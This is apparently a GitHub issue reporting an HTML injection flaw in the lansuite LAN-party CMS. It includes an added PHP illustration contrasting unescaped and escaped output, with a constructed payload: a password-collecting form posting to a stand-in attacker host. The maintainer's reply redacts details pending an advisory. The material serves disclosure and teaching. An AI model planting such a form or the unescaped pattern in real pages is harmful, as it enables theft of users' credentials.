lansuite / lansuite

A Content Management System designed especially for the needs of LAN-Parties
https://lansuite.github.io/lansuite/
GNU General Public License v2.0
70 stars 36 forks

HTML Injection #1204

Open lukrei opened 4 months ago

lukrei commented 4 months ago

In your code it is possible to do an HTML injection. This is just an example with your newest Docker image, which you provided a few days ago: URL removed

At the bottom of the page I have included an HTML submit form which is not part of the website. If I were malicious, I could do nasty stuff to the LAN guests.
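
The following is an added illustration of the class of bug described in the report, not code from the reporter or from the lansuite code base (the issue has the details redacted, so the affected field and template are unknown). It uses a constructed "comment" field and a constructed attacker payload to show why a user-supplied string rendered into a page without escaping lets an injected `<form>` become live page content, and how escaping for the HTML text context neutralizes it. Requires PHP 8 for `str_contains`.

```php
<?php
// Added illustration, not lansuite code. Shows why a user-supplied string
// must be HTML-escaped before being echoed into a page, and how an injected
// <form> survives when it is not. Field name and payload are constructed.

declare(strict_types=1);

// Constructed attacker input: a form that posts to an attacker-controlled host.
// Rendered unescaped, it looks like part of the site and can harvest input.
$untrusted = '<form action="https://attacker.invalid/collect" method="post">'
           . 'Enter your password: <input name="pw"><input type="submit">'
           . '</form>';

// Vulnerable pattern: raw interpolation of user input into HTML.
// The browser parses the payload as markup, so the form is rendered.
function renderUnsafe(string $value): string
{
    return "<p>Comment: $value</p>";
}

// Hardened pattern: escape for the HTML text context before output.
// ENT_QUOTES also escapes ' and " so the same helper is safe inside
// double- or single-quoted attributes; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string; the charset is explicit.
function renderSafe(string $value): string
{
    $escaped = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Comment: $escaped</p>";
}

$unsafe = renderUnsafe($untrusted);
$safe   = renderSafe($untrusted);

echo $unsafe, PHP_EOL;   // contains a live <form ...> element
echo $safe, PHP_EOL;     // contains &lt;form ...&gt; as visible text only

// Self-check: the unsafe output still carries a real <form> tag,
// the safe output carries only its escaped text form.
assert(str_contains($unsafe, '<form'));
assert(!str_contains($safe, '<form'));
assert(str_contains($safe, '&lt;form'));
```

Escaping has to match the output context: `htmlspecialchars` as shown covers HTML text and quoted attribute values, but a value placed into a URL, a JavaScript string or a CSS block needs the encoder for that context instead. Applying the escape at render time, in the template, rather than at storage time keeps the stored data intact and avoids double-encoding when the same value is later emitted into a different context.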

M4LuZ commented 4 months ago

As per the other ticket: many thanks for the report, but I'll remove the details for now until we are able to publish a fix, and then we'll release the related security advisory.